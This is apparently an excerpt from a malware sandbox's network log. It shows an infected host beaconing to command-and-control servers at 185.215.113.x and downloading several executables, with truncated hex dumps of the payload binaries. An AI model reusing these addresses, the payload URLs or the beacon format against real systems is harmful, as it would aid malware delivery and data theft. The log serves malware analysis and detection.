Nov 22, 2024 20:36:24.073242903 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:36:24.073260069 CET	1236	IN	Data Raw: df 2e 8f a4 c4 0c 97 24 8e f4 91 4f 22 17 4a ff 24 a6 dd cd 5f bd c7 7e ce 33 48 f0 64 75 19 7f 95 4c a2 ff bc b6 76 f0 8d 3e f6 62 e2 2f c6 a9 e6 9e 94 a7 a6 fe b1 ea 08 8b 4c 22 7c d9 7a 7a 87 4b 0b c3 64 8e 91 d0 5b 83 9b 11 50 b9 0b f2 94 c7 Data Ascii: .$O"J$_~3HduLv>b/L"\|zzKd[P2f'b:3LL{dOKj*LKjZfu_if@oyelGfI&xP~u!+bMJmy[o\|u (u:a\G:lBv
Nov 22, 2024 20:36:24.073277950 CET	1236	IN	Data Raw: 10 99 37 f7 cc db 34 db 24 85 8a e3 d1 6b 5b 54 a2 d2 34 d9 56 cd 85 57 4d f8 43 e7 de 76 d8 d8 bd f7 c8 39 8e ee 6d 01 ef 7f d0 56 e7 b2 82 63 bb b6 c7 b0 22 df b4 2d 2b 57 bc f6 6e 95 a1 dd 3d e4 65 c2 08 2b c7 d5 1d cf d9 8b 85 22 80 8d 5e 9f Data Ascii: 74$k[T4VWMCv9mVc"-+Wn=e+"^9`?Q{:HIG)~\|]9MpXNc;Z4>k@-;^1iP6K(81">1+O{4S,L+76]L'?E
Nov 22, 2024 20:36:24.073295116 CET	1236	IN	Data Raw: 7f 99 04 7f fc ee d8 fa 22 99 7d e6 d5 38 dc e2 fe 75 af 34 31 67 f9 de 7c ac 25 16 e9 a2 a7 ae d7 f7 0b 3b c2 89 01 93 76 3e cd e2 de 3a 7a 72 f6 5a 75 92 71 3e 98 22 20 f8 7a 99 b3 6e 8e f9 8c cb 6c bb a3 65 55 00 97 b7 2a f1 5c 07 4b 07 89 af Data Ascii: "}8u41g\|%;v>:zrZuq>" znleU*\KaYz&\|0&B9sA!J{fK4kV_d]1omq6<r~1v7}a150]Gh q;o!7.m}
Nov 22, 2024 20:36:24.073363066 CET	1000	IN	Data Raw: 19 fd 46 de ad b7 bb 71 c4 56 65 85 c9 43 04 7a 8d f0 0e 39 67 c5 f8 be 8e f2 45 d8 eb 3d 96 93 84 36 db 4e 8e 3e c9 2e 27 c9 fc 72 7b 47 aa 6e 5b c2 d7 f2 32 5a 94 cf 2b dc 70 42 1e 17 62 89 8a d1 fc 73 95 de de 6f b1 c5 6f 50 86 f7 94 9f 1f 51 Data Ascii: FqVeCz9gE=6N>.'r{Gn[2Z+pBbsooPQOuq6C6\|zc6kk~y\|$~h/?G`][@;zqp%;Cx(mb>&xNn9 5}2AU^:+v\|[
Nov 22, 2024 20:36:24.073386908 CET	1236	IN	Data Raw: 6a 49 96 e6 fb f6 66 bf 63 71 25 9f 25 9e d6 22 a0 3e 84 80 f2 bf 5c d4 39 38 9c 6a 99 8a 09 01 e5 5f 12 ca 5a ac af 5e b7 81 c6 08 0e 72 ea f0 59 e8 c9 a6 91 7d 75 22 a3 b6 9b b7 42 ca bc 7e c7 d6 ff 4f 90 5d 53 83 72 d2 7f ac 57 58 20 e7 a1 5e Data Ascii: jIfcq%%">\98j_Z^rY}u"B~O]SrWX ^=X3"b(_<p`$\|qd)+ l.8vtdjjEFP+uy#8$R"v\s(wdIXfzR
Nov 22, 2024 20:36:24.073402882 CET	1236	IN	Data Raw: df 39 cc 53 89 1c f7 30 a7 05 7b f5 e5 b7 03 4c c7 57 fc d0 fb aa ae b2 19 98 32 fa 9c 0a 71 33 0a c7 2c 61 7f de 79 3a 26 8c 2e 08 05 52 9a 1c 2d 68 4c bf 5c 9f 9c 90 63 f5 2a 74 18 de 79 d3 39 bf 9d 18 e7 29 4e 8e 35 0b af 92 bc e7 c8 69 81 16 Data Ascii: 9S0{LW2q3,ay:&.R-hL\c*ty9)N5irz7-]}FQZ?"`~[)jw.u}7FP\|WRW"d(mur!Gj7k`AVj>ne]'SnvHOs_'$MD\QKD
Nov 22, 2024 20:36:24.192902088 CET	1236	IN	Data Raw: 75 be e9 fd c4 2a 81 39 77 de 96 22 7d 15 4c 93 68 f3 4f 51 01 d6 53 f5 e6 de 19 b6 5c b7 ed db 9f 5d 47 8f 4d 39 97 e7 64 f2 53 ea 99 5d 2c 5d 3c c7 0a 1b fb 00 94 28 35 3b 4b f3 d6 89 74 06 da f0 79 d2 8a 24 7f 72 e3 0b f8 e2 b0 22 90 7b 7a a5 Data Ascii: u*9w"}LhOQS\]GM9dS],]<(5;Kty$r"{z>1'>YbvfUC\E~G7179mCdo>;A}=u5F-dN`S~bt3.;#].BB`C`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49842	185.215.113.43	80	7896	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:36:30.284606934 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 38 32 35 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008251001&unit=246122658369
Nov 22, 2024 20:36:31.459554911 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Nov 2024 19:36:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49846	185.215.113.16	80	7896	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:36:31.584383965 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 22, 2024 20:36:32.963123083 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Nov 2024 19:36:32 GMT Content-Type: application/octet-stream Content-Length: 1789440 Last-Modified: Fri, 22 Nov 2024 19:33:08 GMT Connection: keep-alive ETag: "6740dc74-1b4e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 24 01 00 00 00 00 00 00 50 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 68 00 00 04 00 00 be 99 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPELO/g$Ph@h@M$a$$ $b@.rsrc$r@.idata $t@ )$v@wkrmqwhoNx@fzxxpvmm@h(@.taggant0Ph",@
Nov 22, 2024 20:36:32.963171005 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:36:32.963187933 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:36:32.963232040 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:36:32.963247061 CET	496	IN	Data Raw: b8 dd 3c 21 8a c2 91 9e c2 6e c5 a3 4d 45 aa a8 b7 4c c3 fb 09 a7 68 3e aa 46 06 fd e5 dd 98 94 1a bd e7 9c 44 a2 f5 fd 84 5c 86 51 b5 49 d0 34 62 f3 c8 ac aa 4a 6c 76 a3 3d c2 f8 54 4d dc 6d 22 90 64 5d 3a b4 00 f8 8f da cd fb 2b 73 b8 13 a2 35 Data Ascii: <!nMELh>FD\QI4bJlv=TMm"d]:+s5jaX~(wvf<\|huHR4okm%t-Xv vI:7f6(A<35sdu%>w}y{&![xSp!Q\`T(mN5D*T/Q
Nov 22, 2024 20:36:32.963263988 CET	1236	IN	Data Raw: 8d f7 5a 32 b4 20 72 f0 17 ad 32 20 bc 2c d5 ac 2b 09 f3 8c aa 04 f4 1d ca c8 a3 53 b0 7a f4 32 08 85 8d 27 2f 45 98 ce 17 75 58 08 58 89 66 cc ca 68 78 0e ff ec a4 74 94 f7 e5 e5 b3 48 88 0e c2 78 ed f7 dd cf 8a 37 dd e6 27 9c 5b 43 8b 01 ae 3f Data Ascii: Z2 r2 ,+Sz2'/EuXXfhxtHx7'[C?o;dIxP}{hMz4nd?aG\|NY#((sXYFG.,xskT^v2+03
Nov 22, 2024 20:36:32.963279963 CET	224	IN	Data Raw: 34 77 f8 fb ad fe bc db a2 a1 34 76 a3 46 bb 5d 2e 76 fd 53 e7 eb d9 9c fd 76 80 af 26 b2 75 6d 72 0c f8 fc 18 46 d0 a4 36 09 e2 ef 7d 35 d8 47 9e 03 f9 52 aa 35 fa 58 32 09 f0 48 c7 fc 3c 8e 71 86 84 66 93 83 da 49 7d 14 33 d6 5f fd 08 4d 9d be Data Ascii: 4w4vF].vSv&umrF6}5GR5X2H<qfI}3_Mq'~{f+J;+)kud!pzA(en[[KO; z$Z85`(=]Rm_!od6p2Aj52c)Q[TJ
Nov 22, 2024 20:36:32.963298082 CET	1236	IN	Data Raw: 0b 16 9a 14 e2 48 f0 a0 f8 4c a9 68 ae 09 7f 91 46 b0 fd 2f 12 0d 9f 5c be 06 9c fb b4 3b d3 63 c6 fd 7b 77 fa dd 87 53 a6 5e 23 5a 7e 5e 00 58 92 d6 61 0f b0 72 fd ca 5b e9 2e 12 74 1e f8 d3 1b ed 8a 1d 8a 13 b9 b8 e5 f9 07 c0 e3 78 36 38 dd 46 Data Ascii: HLhF/\;c{wS^#Z~^Xar[.tx68F&Che[HzO\|&;jO\;y.~$Cs`}p{7@J{[p'{f~vbDbw83?aW^C)NPX~E\]
Nov 22, 2024 20:36:32.963330984 CET	1236	IN	Data Raw: f2 0b ab 4d ca 19 c8 31 63 0e 5d 5d 22 37 89 a3 b2 fd fd 94 4a 0a ba 74 52 0b 80 d3 2c cd b5 1b 34 8e c8 eb aa ed f4 5b 2e 3a ec 95 c4 a8 80 2a c9 15 c8 93 da 82 04 72 b8 7d a0 4f e2 16 04 95 b4 45 82 19 97 e9 86 2c 0e 09 54 4e cd 2f f7 33 5a 36 Data Ascii: M1c]]"7JtR,4[.:*r}OE,TN/3Z6]&})>:X- :jy8>\|1Sk>~v;AUG~\P${Q&"}]u;0WxWC!@!_2-3Cy
Nov 22, 2024 20:36:32.963350058 CET	1236	IN	Data Raw: 46 50 b2 fb b3 f9 9c 1c 3a 81 99 7a e4 fd 87 38 36 1d 86 33 3e 21 b2 64 c6 f9 a9 2b b8 37 b0 1c 8e 7d ed 66 b2 6c fc 55 bb 05 d0 93 56 39 9a 60 37 1d e8 21 e4 79 ea ac e7 09 79 0d 7f 85 f4 21 42 1c 14 96 e6 f3 7f 64 26 a5 78 d3 26 46 90 37 67 04 Data Ascii: FP:z863>!d+7}flUV9`7!yy!Bd&x&F7g5"!Mt={#y!^LyC"SMx2`L-F9?!~M@a!L=E$%gU-yLO>^QE4\|{mw}-\|
Nov 22, 2024 20:36:33.085452080 CET	1236	IN	Data Raw: ba 79 89 2f d4 7d 95 3e 04 ab a0 8f b8 35 91 f3 2b 07 8d 1d f6 1c 80 47 32 0b 81 83 2d 1e 77 37 da b7 91 83 b6 fd ca 22 93 fb fb 34 de 79 f0 21 32 82 f9 e6 ab 55 a8 bb 43 0b 28 14 c2 95 c8 d0 a8 91 59 f1 62 fd 88 d3 f1 3d f8 9c 4e 4e be 33 72 0b Data Ascii: y/}>5+G2-w7"4y!2UC(Yb=NN3r-M8Y:`"c!W-;,I)u}l0O>%IgyyS+-u$r%<S`2'=$8c3N?:}'Ms9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49864	185.215.113.43	80	7896	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:36:38.576813936 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 38 32 35 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008252001&unit=246122658369
Nov 22, 2024 20:36:40.004170895 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Nov 2024 19:36:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49870	185.215.113.206	80	5956	C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:36:39.619172096 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 22, 2024 20:36:40.949210882 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 22, 2024 20:36:40.993695021 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKFCAAKFBAEHJJJJDHIE Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 36 38 37 42 34 42 30 35 45 33 46 33 32 33 35 31 31 34 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 2d 2d 0d 0a Data Ascii: ------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="hwid"7687B4B05E3F3235114199------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="build"mars------KKFCAAKFBAEHJJJJDHIE--
Nov 22, 2024 20:36:41.433150053 CET	210	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49872	185.215.113.16	80	7896	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:36:40.129235983 CET	55	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 22, 2024 20:36:41.492561102 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Nov 2024 19:36:41 GMT Content-Type: application/octet-stream Content-Length: 923136 Last-Modified: Fri, 22 Nov 2024 19:31:16 GMT Connection: keep-alive ETag: "6740dc04-e1600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fb db 40 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 66 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPEL@g"fw@p2@@@d\|@u4@.text `.rdata@@.datalpH@.rsrc@@@.relocuv@B
Nov 22, 2024 20:36:41.492602110 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY
Nov 22, 2024 20:36:41.492619991 CET	1236	IN	Data Raw: b7 6c fd ff ff 8b ce e8 f7 ba 00 00 33 c9 c7 46 0c 01 00 00 00 89 0e 8b 03 8b 40 04 03 c7 39 88 98 fb ff ff 74 35 89 4d fc 51 8d 4d fc 51 8d 88 94 fb ff ff e8 2f 05 00 00 8b 03 8d 8f 98 fb ff ff 8b 40 04 03 c8 e8 c6 04 00 00 8b 03 8b 40 04 03 c7 Data Ascii: l3F@9t5MQMQ/@@ulIOkOu3_OO_`d<IvY\|#l)\DItv
Nov 22, 2024 20:36:41.492686033 CET	1236	IN	Data Raw: 7f 00 00 8d 8e 9c 00 00 00 e8 10 7f 00 00 8d 8e 8c 00 00 00 e8 05 7f 00 00 8d 4e 08 5e e9 00 00 00 00 56 57 8b f9 33 f6 8b 44 f7 04 85 c0 0f 85 4e 0d 04 00 46 83 fe 10 7c ee 5f 5e c3 53 56 8b f1 33 db 57 38 5e 09 0f 85 54 0d 04 00 38 5e 08 75 1c Data Ascii: N^VW3DNF\|_^SV3W8^T8^uNy8tQ~^_^[VN j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj
Nov 22, 2024 20:36:41.492705107 CET	1236	IN	Data Raw: 00 5f 5e 5b c9 c2 08 00 49 eb 89 41 eb 86 8d 47 01 89 02 eb dc e8 5b 01 00 00 84 c0 74 0e 8b ca e8 50 01 00 00 84 c0 74 03 b0 01 c3 32 c0 c3 55 8b ec 51 51 56 8b f1 80 be 6d 01 00 00 00 8b 86 68 01 00 00 75 53 ff 70 04 e8 1e 09 00 00 8d 4d ff c7 Data Ascii: _^[IAG[tPt2UQQVmhuSpMEQMQPx$}dtmhuIEA^j@0I0uuUQQVW}EPEEPWNx8OEfx3
Nov 22, 2024 20:36:41.492722034 CET	1236	IN	Data Raw: 00 83 f8 12 0f 8d e0 04 04 00 83 e8 04 83 f8 0a 77 94 ff 24 85 85 27 40 00 6a 7f 58 66 3b d8 0f 84 c2 06 04 00 8b 19 33 c0 66 85 c0 74 1c 8b 45 90 40 89 45 90 8b 1c 81 0f b7 43 08 66 3b 85 50 ff ff ff 75 e4 e9 9d 06 04 00 83 3b 05 75 df 8b 04 91 Data Ascii: w$'@jXf;3ftE@ECf;Pu;u3f9X'ULUf9Y]79^99L99!:9#, rU]
Nov 22, 2024 20:36:41.492744923 CET	1236	IN	Data Raw: 85 79 02 04 00 38 5f 08 75 1c 8b 47 04 6a 08 50 8b 70 04 e8 c8 d5 01 00 59 59 89 77 04 88 5f 09 ff 0f 5f 5e 5b c3 b3 01 eb f3 55 8b ec 56 8b f1 80 7e 09 00 0f 85 5f 02 04 00 6a 08 e8 ad d5 01 00 59 8b 4d 08 8b 09 89 08 8b 4e 04 89 48 04 89 46 04 Data Ascii: y8_uGjPpYYw__^[UV~_jYMNHF^]UQSV3W8^?8^u7~G0EtO ,O$j8WIEYYF^_^[UWVj8)YuON0w^_]UVuWO
Nov 22, 2024 20:36:41.492763996 CET	1236	IN	Data Raw: a3 88 13 4d 00 ff d6 57 ff 35 8c 13 4d 00 ff d6 5f 5e c3 55 8b ec 83 ec 40 a1 58 13 4d 00 56 33 f6 a3 04 19 4d 00 6a 0f c7 45 c4 30 00 00 00 c7 45 c8 2b 00 00 00 89 75 d0 c7 45 d4 1e 00 00 00 89 45 d8 89 75 e0 ff 15 3c c7 49 00 89 45 e4 8b 45 10 Data Ascii: MW5M_^U@XMV3MjE0E+uEEu<IEEEEEEPuEIE}A0IhIfM IMEPEE;Ijjj!jjIh5M\M4IPj5\MI5`M^UVW
Nov 22, 2024 20:36:41.492815971 CET	1236	IN	Data Raw: cc 00 00 00 2d 8f 00 00 00 0f 84 d8 fc 03 00 48 83 e8 01 0f 84 ba fc 03 00 2d ff 01 00 00 0f 84 94 fc 03 00 2d ef 00 00 00 0f 84 8f 00 00 00 3b 3d 28 25 4d 00 0f 84 58 fc 03 00 ff 75 0c ff 75 08 57 56 ff 15 08 c7 49 00 5f 5e 5b 8b e5 5d c3 85 c0 Data Ascii: -H--;=(%MXuuWVI_^[]tt%jVIM73jhjV$IhI I=M(%MuIMuQQVMjIU<SVWj,EE0jP
Nov 22, 2024 20:36:41.492832899 CET	1236	IN	Data Raw: 4d 00 ff 53 56 57 33 db c7 05 94 19 4d 00 01 01 01 01 68 58 cb 49 00 89 1d 90 19 4d 00 66 89 1d 98 19 4d 00 c6 05 9a 19 4d 00 01 c7 05 9c 19 4d 00 09 00 00 00 89 1d a8 19 4d 00 e8 0a 66 00 00 68 3c cb 49 00 b9 bc 19 4d 00 e8 fb 65 00 00 b9 cc 19 Data Ascii: MSVW3MhXIMfMMMMfh<IMeMrMrMrM4MMMMMMMMj_MMMMMMMMM M$M0Mrud
Nov 22, 2024 20:36:41.612970114 CET	1236	IN	Data Raw: 53 52 51 ff 15 18 c0 49 00 85 c0 75 4f 8b 45 0c 57 8d 3c 00 8d 45 fc 89 7d fc 50 56 53 53 ff 75 08 ff 75 f8 ff 15 20 c0 49 00 85 c0 75 15 8b 45 fc d1 e8 89 45 fc 3b 45 0c 73 18 33 c9 66 89 0c 46 b3 01 ff 75 f8 ff 15 1c c0 49 00 8a c3 5f 5e 5b c9 Data Ascii: SRQIuOEW<E}PVSSuu IuEE;Es3fFuI_^[3fD72V\|M]8MW3=MZ=@M M@I95(Mv"$Mj4$MYY<F;5(Mr5$M=(MYMM<I5M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49886	185.215.113.43	80	7896	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:36:45.765703917 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 38 32 35 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008253001&unit=246122658369
Nov 22, 2024 20:36:47.246802092 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Nov 2024 19:36:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49892	185.215.113.16	80	7896	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:36:47.384970903 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 22, 2024 20:36:48.799129963 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Nov 2024 19:36:48 GMT Content-Type: application/octet-stream Content-Length: 2819584 Last-Modified: Fri, 22 Nov 2024 19:31:41 GMT Connection: keep-alive ETag: "6740dc1d-2b0600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 57 d5 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ +W+`Ui` @ @.rsrc`2@.idata 8@jajeyrhy*:@xqskffqo `+@.taggant@+"*@
